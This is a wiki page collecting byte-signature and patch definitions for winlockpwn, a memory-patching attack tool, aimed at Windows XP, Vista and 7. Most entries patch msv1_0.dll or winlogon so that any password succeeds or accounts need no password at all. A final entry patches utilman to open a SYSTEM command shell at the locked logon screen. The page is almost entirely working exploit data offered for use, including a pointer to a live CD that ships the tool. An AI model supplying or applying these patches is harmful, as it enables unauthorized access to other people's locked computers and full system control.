Scratchpad

If you are new to Scratchpad, and want full access as a Scratchpad editor, create an account!
If you already have an account, log in and have fun!!

READ MORE

Scratchpad
Register
Advertisement

This page lists offsets and payloads I've come across that can be used with winlockpwn. People who want to contribute other offsets/payloads for in-memory Windows trickery can add it here.

Looking for the easiest way to give winlockpwn a try? Download and boot a Helix LiveCD. It's got winlockpwn and required libraries preinstalled, just add the new targets you find here.


Windows 7 SP1

  {"name":"Windows 7 SP1 32bit msv1_0.dll technique, Koen Bossaert 2011 koen(dot)bossaert(at)getronics.com",
  "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password.",
  "phase":[{
  "sig":"32C0E9AB6BFFFF",
  "pageoffset":[0x76B],
  "patch":"B001",
  "patchoffset":0x0}]
  },


  {"name":"Windows 7 SP1 32bit msv1_0.dll technique, Koen Bossaert 2011 koen(dot)bossaert(at)getronics.com(alternative patch)",
   "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password.",
   "phase":[{
   "sig":"84C00F848E9E00008B8538F8FFFF",
   "pageoffset":[0x8E5],
   "patch":"9090",
   "patchoffset":0x0}]
  },


Windows 7 SP0 from anonymous on pastebin:

              	{"name":"Win7 32-bit msv1_0.dll technique",
                 "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!",
                 "phase":[{
                 "sig":"83F8107513B0018B",
                 "pageoffset":[0x926],
                 "patch":"83F8109090B0018B",
                 "patchoffset":0}]
                },
                {"name":"Win7 64-bit msv1_0.dll technique",
                 "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!",
                 "phase":[{
                 "sig":"C60F85C0B80000B8",
                 "pageoffset":[0x926],
                 "patch":"C6909090909090B8",
                 "patchoffset":0}]
                },



From the original winlockpwn script:

  {"name":"WinXP SP2 Fast User Switching Unlock",
  "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
  "phase":[{
  "sig":"8BD8F7DB1ADBFEC3",
  "pageoffset":[2905],
  "patch":"bb01000000eb0990",
  "patchoffset":0}]
  },
  {"name":"WinXP SP2 Unlock",
  "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
  "phase":[{
  "sig":"0502000010",
  "pageoffset":[3696],
  "patch":"b801000000",
  "patchoffset":0}]
  },
  {"name":"WinXP SP2 msv1_0.dll technique",
   "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",
   "phase":[{
   "sig":"8BFF558BEC83EC50A1",
   "pageoffset":[0x927],
   "patch":"B001",
   "patchoffset":0xa5}]
  },
  {"name":"WinXP SP3 msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.",
  "phase":[{
  "sig":"8BFF558BEC83EC50A1",
  "pageoffset":[0x81B],
  "patch":"B001",
  "patchoffset":0xa5}]
  },
  {"name":"Windows Vista msv1_0.dll technique",
  "notes":"Patches the call which decides if an account requires password authentication. Signature and offsets changed with Vista.",
  "phase":[{
  "sig":"8BFF558BEC81EC88000000A1A4",
  "pageoffset":[0x76A],
  "patch":"B001",
  "patchoffset":0xBD}]
  },
  {"name":"WinXP SP2 utilman cmd spawn",
   "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
   "phase":[
   {"name":"Patch code",
   "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
   "pageoffset":[0x39f],
   "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
   "patchoffset":0x0},
   {"name":"Patch data",
   "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
   "pageoffset":[0x9ac, 0x5ac, 0x3ac],
   "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
   "patchoffset":0x0,
   "keepgoing":True,
   }
   ]
Advertisement